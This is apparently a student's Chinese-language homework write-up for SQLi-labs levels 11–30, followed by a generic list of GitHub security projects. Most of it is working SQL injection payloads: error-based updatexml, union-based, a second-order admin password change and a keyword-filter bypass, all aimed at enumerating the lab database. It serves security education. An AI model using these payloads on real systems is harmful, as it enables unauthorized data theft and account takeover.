我的网安作业5

less11

弱口令猜测账号密码

判断闭合方式

判断列长

报错注入 查询当前数据库名

admin'  and updatexml(1,concat(1,database()),1) #

报错注入 查出网站的数据库里的目标表名

admin' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) #

报错注入 查出目标表中的所有列名

admin' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' )),1) #

less12

与十一关差不多,闭合方式不同,闭合方式为:") #

然后重复十二关的注入方式

 查询当前数据库名

admin") and updatexml(1,concat(1,database()),1) #

 查出网站的数据库里的目标表名

admin") and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) #

 查出目标表中的所有列名

admin") and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #

level 13

判断闭合方式,闭合方式为:') #

之后与之前两关一样

报错注入 查询当前数据库名

admin') and updatexml(1,concat(1,database()),1) #

报错注入 查出网站的数据库里的目标表名

admin') and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security' )),1) #

报错注入 查出目标表中的所有列名

admin') and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #

less14

判断闭方式,闭合方式为:" #

admin"and 1=1#

之后与之前一样

判断字段列数

报错注入 查询当前数据库名

admin" and updatexml(1,concat(1,database()),1) #

报错注入 查出网站的数据库里的目标表名

admin" and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) #

报错注入 查出目标表中的所有列名

admin" and updatexml(1,concat(1,(select group_concat(column_name)from information_schema.columns where table_schema='security'and table_name='users' )),1) #

less 15

判断闭合方式

less 23

查询数据库名

id=-1' union select 1,database(),3 and '1' = '1

less24

在注册账号时可以输入特殊字符,例如admin'#

通过查看源码可以得知在修改密码时的闭合方式为‘#

修改密码,通过将admin闭合,之后的内容不执行,达成恒真条件,完成修改管理员密码的注入

less25

提示与or和and有关,发现or和and都被过滤掉了

 闭合方式为' --+

查询数据库名

?id=-1' union select 1,database(),3 --+

查询表名

由于本关卡过滤or,所以'information'需要写成‘infoorrmation’

?id=-1 ' union select 1, group_concat(table_name) ,3 from infoorrmation_schema.tables where table_schema='security' --+
 

less29

判断闭合方式  闭合方式为‘--+

爆库

id=-1' union select 1,(database()),3 --+

爆表

id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

less30

闭合方式为”--+

联合注入,爆库

?id=-1" union select 1,database(),3 --+

联合注入,爆表

?id=-1" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

GitHub是一个基于Web的代码托管平台,它提供了版本控制和协作功能,让开发者可以方便地共享和管理代码。在GitHub上,有很多与网安相关的项目,这些项目致力于保护网络安全、防止黑客攻击和提高系统的安全性。以下是一些常见的GitHub网安项目: 1. OWASP(开放式Web应用程序安全项目):OWASP是一个致力于提高Web应用程序安全性的国际组织。他们在GitHub上维护了一系列开源项目,包括安全工具、漏洞测试和安全指南等。 2. Metasploit:Metasploit是一个广泛使用的渗透测试框架,它提供了一系列工具和资源,帮助安全专家评估和增强系统的安全性。Metasploit在GitHub上有一个官方仓库,开发者可以在这里获取最新的代码和贡献自己的改进。 3. Snort:Snort是一个开源的入侵检测系统(IDS),它可以监测网络流量并检测潜在的攻击行为。Snort的代码托管在GitHub上,开发者可以参与到项目中,改进和定制自己的IDS规则。 4. Nmap:Nmap是一个网络扫描和主机发现工具,它可以帮助安全专家评估网络的安全性。Nmap的源代码也在GitHub上开放,用户可以自由地访问和贡献代码。 5. Security Shepherd:Security Shepherd是一个教育性的Web应用程序,旨在帮助开发者学习和理解常见的Web安全漏洞。它提供了一系列的挑战和实验,供用户测试和提高自己的安全技能。Security Shepherd的代码也在GitHub上开源。 这些项目只是GitHub上众多网安项目的一小部分,你可以通过在GitHub上搜索关键词来找到更多与网安相关的项目。希望这些信息对你有帮助!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值